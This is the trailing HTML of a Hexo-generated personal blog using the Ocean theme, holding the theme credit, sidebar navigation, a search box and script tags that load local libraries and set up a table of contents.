      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/hexo.svg" alt="summerN&#39;s blog"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>